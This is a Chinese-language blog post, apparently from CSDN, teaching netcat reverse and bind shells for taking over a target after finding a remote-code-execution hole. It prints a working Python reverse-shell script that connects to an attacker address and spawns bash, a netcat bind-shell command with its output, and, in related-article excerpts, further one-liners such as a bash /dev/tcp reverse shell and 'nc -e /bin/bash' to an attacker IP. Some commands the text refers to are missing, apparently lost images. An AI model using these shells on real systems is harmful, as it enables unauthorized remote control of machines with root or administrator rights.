使用netcat的正向 / 反向shell

已于 2024-01-03 13:42:14 修改
阅读量381 收藏 3
点赞数
分类专栏: 安全测试 文章标签: linux shell centos ubuntu python
于 2019-01-08 14:24:00 首次发布
土法炼钢师呕血之作,转载还望说明出处!
本文链接:https://blog.csdn.net/bo_mask/article/details/118690728
版权

  • reverse shell

  • bind shell

reverse shell描述图:

在此示例中,目标使用端口4444反向连接攻击主机。-e选项将Bash shell发回攻击主机。请注意,我们也可以在Windows的cmd.exe上使用-e选项。假设我们已经在目标主机上找到了远程代码执行(RCE)漏洞。我们可以在目标主机上使用-e发出Netcat命令,并使用Netcat发出命令启动反向shell。

先启动攻击端的监听:

再在目标端启动反向shell:

 linux

然后可以在攻击端控制目标端的服务器,以root权限;

win7

然后可以在攻击端控制目标端的win7系统,以administrator权限;

python的反向shell:

import os,socket,subprocess;
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.aaa.21',8080))
#重定向shell输出
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
#执行子程序
p=subprocess.call(['/bin/bash','-i'])

正向bind Shell

在该图中,目标使用Netcat侦听器将Bash shell绑定到它特定端口4444。攻击者使用简单的Netcat命令连接到此端口。设置bind shell的步骤如下:

使用Netcat将一个bash shell绑定到4444端口。 从攻击主机连接到端口4444上的目标主机。 从攻击主机发出命令到目标主机上。

root@kali:~# nc -lvp 4444 -e /bin/sh
listening on [any] 4444 ...
10.1.20.x: inverse host lookup failed: Unknown host
connect to [10.1.20.x] from (UNKNOWN) [10.1.20.x] 6065
root@kali:~# a

顺便提一下

如果有任何问题,你可以在这里找到我 ,软件测试交流qq群,209092584

软件测试技术
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
反向 shell 访问工具 netcat
一个软件工程师的技术笔记
03-08 654
问题 在实际开发项目中,原型产品在推向市场、实际部署使用之前,也需要在实际环境进行试验性运行,以便测试和改进。 但可能出现的一个问题是,部署测试的实际环境与办公室有一定的距离,甚至在不同的城市里。当应用服务程序异常后者挂掉的时候,就没有办法探查设备的实际情况了。 要是在办公室里,就可以基于局域网 ssh 登录访问,甚至基于调试串口登录。由于设备在远程,是无法通过 ssh 直接登录了。 基本...
内网中使用netcat进行正向反向获取shell
bring_coco的博客
12-07 2792
本次演示在linux环境下 一般用外网机器对内网机器进行访问时,多用反向shell,内网机器与内网机器之间多用正向shell 正向shell 由于内网及其属于边界服务器,因此我们先进行正向shell演示(正向shell是在目标机器上进行监听): 内网机器上命令:nc -lvp 4444 -e /bin/sh 本地机器上命令:nc 10.0.78.41 4444 显示已经连接 进行验证: 说明正向连接成功 反向shell 反向shell是在本地vps上进行监听,目标机器进行连接 本地机器上命令:nc -l
Netcat反弹shell
Yy10205473的博客
01-14 566
Netcat反弹shell基础介绍使用python反弹shell应用场景使用方法当nc不支持-e时如何反弹shell应用场景使用方法 #应用场景 某些拿到服务器权限之后,想要设置一个反弹shell。但是目标服务器上没有安装nc时。 基础介绍 将liunx系统下的bash(shell)传递到window系统下的pc 反弹shell:bash -i >& /dev/tcp/IP地址/端口 0>&1 liunx主机连接window主机 bash -i :已交互模式运行bash she
netcat获得反向shell
天元喜羊羊的博客
07-06 3959
netcat下载地址:http://sourceforge.net/projects/netcat/?source=navbar 在BT5上: root@bt:~# nc -l -p 8090 -e /bin/sh 在XP上: E:\>nc 192.168.1.11 8090 ls Desktop ifconfig eth0 Link encap:Ethernet HWaddr
32+64位socat,Android版,arm+arm64,android手机可用,android反向shell工具
最新发布
04-16
android反向shell工具。 本zip包含socat arm版本 和 arm64版本,可以push到android设备运行。 例如: adb push socat /data/local/tmp/ adb shell cd /data/local/tmp/ /socat -d TCP4-LISTEN:10001,fork EXEC:/...
Reverse-Shell-Client:反向外壳客户端是netcat反向外壳侦听器的基于Python的替代方案
05-08
反向外壳客户端是netcat反向外壳侦听器( nc -lvp <port> )的基于Python的替代方案。 默认的反向Shell客户端( rsh-client.py )附带了许多功能,例如在您设法获得Shell的(基于Unix的)远程主机上上传,下载,...
Netcat for windows 32/64 bit
04-04
Netcat for windows 32/64 bit
rsh:从CLI为LinuxWindows生成反向Shell
02-01
产品特点使用此工具,您可以轻松地使用以下语言快速生成LinuxWindows支持的反向Shell命令: 重击Bash反向壳网猫网猫OpenBSD 非传统PythonIPv4 IPv6 RubyPerlPHP 电源外壳节点JS TCSH Awk Java用法usage: rsh [-h] ...
netcat.zip 源代码
06-11
netcat.zip 源代码
netcat 1.13 by chenghao0511
05-01
netcat -C ip port -e cmd.exe
How to: Shellcode to reverse bind a shell with netcat(如何使用netcat进行shellcode反向链接)
Shellcode.Cool!
05-23 1489
Imagine you found a vulnerability in a web server and decided to take over that machine to do your dirty deeds, what do you do? Well, for starters, you have to figure out how to exploit the vulnerabil
Netcat 从监听开始简单易懂 ,正向反向shell 的学习过程
任雪飘的博客
03-01 601
大家好!我是任雪飘!一个web 菜鸡,讲一个nc 正向反向shell 的学习过程! 首先我们下载netcat 安装方式一 yum install -y netcat 或者 yum install -y nc 安装方式二 https://eternallybored.org/misc/netcat/ 把netcat 放入linux 系统里面 进入netcat-0.7.1.tar.gz所在目录,并执行下面的命令: tar -zxvf netcat-0.7.1.tar.gz -C /u
netcatshell反弹测试
HideInTime的博客
04-21 402
什么是反弹shell?   反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,
Windows下安装使用netcat
junR_980218的博客
06-20 6958
Windows下安装使用netcat
Netcat详解
热门推荐
发哥微课堂
09-24 4万+
0x00:介绍 netcat 简称 nc,安全界叫它瑞士军刀。ncat 也会顺便介绍,弥补了 nc 的不足,被叫做 21 世纪的瑞士军刀。nc 的基本功能如下: telnet / 获取系统 banner 信息 传输文本信息 传输文件和目录 加密传输文件 端口扫描 远程控制 / 正方向 shell 流媒体服务器 远程克隆硬盘 0x01:端口扫描 首先应该知道的一个参数是 - h,...
Windows 环境下怎么安装与使用 netcat
qazzaq123_的博客
06-09 869
NetCat,在网络工具中有“瑞士军刀”美誉,其有WindowsLinux的版本。因为它短小精悍(1.84版本也不过25k,旧版本或缩减版甚至更小)、功能实用,被设计为一个简单、可靠的网络工具,可通过TCP或UDP协议传输读写数据。同时,它还是一个网络应用Debug分析器,因为它可以根据需要创建各种不同类型的网络连接。
NetCat(NC)详细教程
qq_41245301的博客
11-29 445
1995年第一个版本公布,NetCat是一个非常简单的Unix工具,可以读、写TCP或UDP网络连接(network connection)。它被设计成一个可靠的后端(back-end)工具,能被其它的程序程序或脚本直接地或容易地驱动。同时,它又是一个功能丰富的网络调试和开发工具,因为它可以建立你可能用到的几乎任何类型的连接,以及一些非常有意思的内建功能。NetCat,它的实际可运行的名字叫nc,应该早很就被提供,就象另一个没有公开但是标准的Unix工具。
netcat使用及反弹shell
Bu2n的博客
02-20 5075
nc正向shell反向shell
06-28
### 回答1: nc正向shell反向shell都是利用nc命令进行远程控制的方式。 正向shell是指攻击者在受害者主机上开启一个监听端口,等待攻击者连接并执行命令。攻击者通过nc命令连接到受害者主机的监听端口,然后在受害者主机上执行命令,从而实现远程控制反向shell是指攻击者在自己的主机上开启一个监听端口,等待受害者连接并执行命令。攻击者通过nc命令连接到受害者主机的监听端口,然后在自己的主机上执行命令,从而实现远程控制。 两种方式的区别在于谁开启监听端口,正向shell是受害者开启监听端口,而反向shell是攻击者开启监听端口。 ### 回答2: NC(Netcat)是一种网络工具,它可以用来读取或发送数据。在网络中,我们经常需要使用一些工具进行网络调试或者代理,NC就是其中一种工具。 NC正向shell反向shell是NC的两个常见用法。正向shell是指用户在目标主机上执行命令,实现远程控制,而反向shell是指攻击者在自己的主机上执行命令,然后将输出发送到受害者主机上,实现远程访问。 NC正向shell的步骤如下:攻击者在自己的主机上监听一个指定的端口,然后等待受害者连接到该端口,一旦连接上,攻击者可以在命令行中执行命令,从而完成远程控制。常用的命令是nc -lvp 8888,其中-l为监听模式,-v为verbose模式,-p指定端口号。 NC反向shell的步骤如下:攻击者在自己的主机上执行命令,将输出转发到受害者主机上的指定端口,受害者主机监听该端口,并返回结果给攻击者,从而实现远程访问。常用的命令是nc -nv 192.168.1.10 8888 -e /bin/bash,其中-n表示不解析hostname,-v为verbose模式,-e指定需要执行的命令。 需要注意的是,NC正向shell反向shell都需要在目标主机上安装NC,所以这种方式可以被探测到。此外,这种方法也容易被防火墙或者IDS、IPS所检测到。因此,当使用这种方式时,需要谨慎考虑风险和安全措施。 ### 回答3: NC( Netcat )是一种将stdin / stdout通道连接到TCP / UDP网络上的工具。它被称为“网络多功能实用工具”,可以通过它创建和连接套接字,仅使用命令行。在黑客的世界里,Netcat 主要用于两种方式,NC 正向shell反向shell正向shell: NC 正向shell 是指将一个主动连接的shell推向另一台主机。这需要创建一个监听程序来等待另一台主机的连接,并在连接时启动shell。在这种情况下,漏洞利用者必须将监听程序推到受攻击机上,以使其等待连接。因此,正向shell只对内网攻击较为有效。 正向shell的实现步骤如下: 1.在攻击端启动监听程序,等待目标主机的连接: $ nc -lvp 4444 其中,-l 表示监听模式, -v 表示详细模式, -p 表示端口号。 2.在被攻击主机上,通过某种方式将目标机器的IP地址和监听程序的端口号传递到攻击者那里。攻击者将使用此信息来建立连接。 3.在受害者主机上执行以下命令以连接到攻击者: $ nc <attackers IP> 4444 -e /bin/bash 其中,-e 表示将建立的连接附加到bash shell。攻击者的IP地址和端口号应该和第二步中传递过来的一致。 反向shell反向shell则是创建一个shell连接,然后将其发送回攻击者的机器,这相当于一种“我打18,先打9”的情况,攻击者会将shell连接推向受攻击的机器。由于攻击者可以控制shell连接,反向shell对于外网和内网攻击都相当有效。 反向shell的实现步骤如下: 1.在攻击端启动监听程序,等待目标主机的连接: $ nc -lvp 4444 其中,-l 表示监听模式, -v 表示详细模式, -p 表示端口号。 2.在受攻击计算机上,执行以下命令(假设我们使用的是 bash shell): $ bash -i>&/dev/tcp/<attackers IP>/4444 0>&1 其中,-i 表示建立连接后使用交互模式,-& 表示将输出重定向到/dev/tcp 中, <attackers IP> 和端口号与第一步中启动的监听程序相同。 总的来说,NC 正向shell反向shell的概念十分简单,但却非常实用。请注意,这种技术只能在计算机彼此之间连接时使用,不要用于未授权的远程攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

软件测试技术

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值